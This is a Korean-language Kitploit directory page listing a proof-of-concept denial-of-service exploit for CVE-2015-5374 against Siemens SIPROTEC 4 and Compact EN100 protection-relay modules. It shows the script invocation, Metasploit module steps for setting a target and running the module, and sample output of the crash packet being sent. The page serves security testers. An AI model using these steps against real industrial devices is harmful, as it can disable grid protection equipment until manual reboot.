Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2015-5374-DoS-PoC — CVE-2015-5374에 대한 DoS 익스플로잇으로, Siemens SIPROTEC 4 및 Compact EN100 이더넷 모듈을 포트 50000으로 전송되는 조작된 UDP 패킷을 통해 공격하며, 포함된 Metasploit 보조 모듈을 사용합니다. | Kitploit
도구/GitHubGitHub/can/cve-2015-5374-dos-poc
Exploit FrameworksVulnerability AnalysisExploitationSCADA/ICS SecurityPenetration Testing
GitHubcan/cve-2015-5374-dos-poc

CVE-2015-5374-DoS-PoC

CVE-2015-5374에 대한 DoS 익스플로잇으로, Siemens SIPROTEC 4 및 Compact EN100 이더넷 모듈을 포트 50000으로 전송되는 조작된 UDP 패킷을 통해 공격하며, 포함된 Metasploit 보조 모듈을 사용합니다.

저장소 보기
3398년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - 서비스 거부

이 코드는 포트 50000/UDP로 특수하게 조작된 패킷을 전송하여 영향을 받는 장치의 서비스 거부를 유발할 수 있습니다. 장치를 다시 서비스 상태로 복구하려면 수동 재부팅이 필요합니다. 이 취약점에는 CVE-2015-5374 및 CVSS v2 기본 점수 7.8이 할당되었습니다.

root@kitploit:~
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!

Metasploit 모듈

이 모듈은 포트 50000/UDP로 특수하게 조작된 패킷을 전송하여 영향을 받는 장치의 서비스 거부를 유발할 수 있습니다. 장치를 다시 서비스 상태로 복구하려면 수동 재부팅이 필요합니다.

검증 단계

  1. 실행: use auxiliary/dos/scada/siemens_siprotec4
  2. 실행: set RHOST [Target IP], [Target IP]를 공격하려는 IP 주소로 바꿉니다.
  3. 실행: run
  • Siemens SIPROTEC 4 또는 Compact 장치가 취약한 버전 중 하나를 사용하는 경우 즉시 충돌합니다.
  • 옵션

    set RHOST [Target IP], set RPORT [Target Port (Default 50000)].

    시나리오

    root@kitploit:~
    msf auxiliary(siemens_siprotec4) > info
    
         Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service 
       Module: auxiliary/dos/scada/siemens_siprotec4
      License: Metasploit Framework License (BSD)
         Rank: Normal
    
    Provided by:
    M. Can Kurnaz
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  50000            yes       The target port (UDP)
    
    Description:
    This module sends a specially crafted packet to port 50000/UDP 
    causing a denial of service of the affected (Siemens SIPROTEC 4 and 
    SIPROTEC Compact) devices. A manual reboot is required to return the 
    device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
    have been assigned to this vulnerability.
    
    References:
    https://www.exploit-db.com/exploits/44103/
    https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
    
    msf auxiliary(siemens_siprotec4) > show options 
    
    Module options (auxiliary/dos/scada/siemens_siprotec4):
    
     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     RHOST                   yes       The target address
     RPORT  50000            yes       The target port (UDP)
    
    msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
    rhost => 192.168.1.61
    msf auxiliary(siemens_siprotec4) > run
    
    [*] Sending DoS packet ... 
    [*] Auxiliary module execution completed
    msf auxiliary(siemens_siprotec4) > 
    
    도구 다운로드